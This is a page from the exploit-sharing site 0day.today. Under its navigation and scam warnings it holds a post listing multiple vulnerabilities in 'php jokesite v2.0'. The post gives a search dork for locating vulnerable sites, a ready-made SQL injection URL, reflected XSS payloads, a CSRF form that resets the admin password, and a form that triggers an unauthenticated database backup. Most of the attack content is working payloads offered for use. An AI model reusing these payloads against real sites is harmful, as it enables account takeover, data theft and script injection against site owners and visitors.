0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
php jokesite v2.0 Multiple Vulnerabilties
php jokesite v2.0 Multiple Vulnerabilties ======================================================================= ####################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Script : http://www.scriptdemo.com/ .:. Tested On Demo : http://www.scriptdemo.com/php-jokesite/ver2.0/ .:. Dork : inurl:"creat_postcard.php?img_id" ####################################################################### ===[ Exploit ]=== Sql Injection ============== http://SITE/creat_postcard.php?img_id=null[sql] http://SITE/creat_postcard.php?img_id=null'+and+1=2+union+select+1,2,3,version(),5,6,7,8,9,10,11-- - Go To Page Source To Found Data Sql Injection Multiple Reflected Xss ======================= https://SITE/jokes_category.php?cat_id=40'"--></style></script><script>alert(1337)</script> https://SITE/pictures_category.php?cat_id='"--></style></script><script>alert(1337)</script> CSRF (Change Password Admin) =============================== <form method="POST" name="form0" action="http://SITE/admin/admin_password.php"> <input type="hidden" name="todo" value="chpasswd"/> <input type="hidden" name="adm_login" value="123456"/> <input type="hidden" name="adm_passwd" value="123456"/> <input type="hidden" name="adm_repasswd" value="123456"/> <input type="hidden" name="update" value="Update"/> </form> </body> </html> Database Disclosure =================== <html> <head> <title>Php Jokesite</title> <form method="post" action="http://SITE/admin/admin_backup_db.php" name="backup"> <input type="hidden" name="todo" value="backup"> <table width="100%" cellspacing="0" cellpadding="1" border="0"> <tr> <td bgcolor="#660099" align="center"><font face="Verdana, Arial" size="2" color="white"><b>Backup database</b></font></td> </tr> <tr> <td bgcolor="#660099"> <TABLE border="0" cellpadding="4" cellspacing="0" bgcolor="#ffffef" width="100%"> <tr> <td align="right"><font face="verdana" size="2" color="#FF0000"><b>Here you can backup your database.<br>We encourage you to make database backup's periodically, the loss will not be so big when something happen to the database.<br>A good option is to name your backup file in a format like this: mm-dd-yy-dbname.sql. This is automatically suggested by Internet Explorer, for other browsers you must introduce the filename.<br>Today suggested filename is : 06-06-2012-bitmix_bitmixjokev20.sql.<br>Also if you can store your backup files in the same directory, to be easy to find the files when you want to restore your database.</b></font></td> </tr> <tr> <td align="right"><input type="submit" name="save" value="Backup"></td> </tr> </table> </td></tr></table> </form> </td> </td> <td width="5"> &nbps; </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </body> </html> ####################################################################### # 0day.today [2024-07-07] #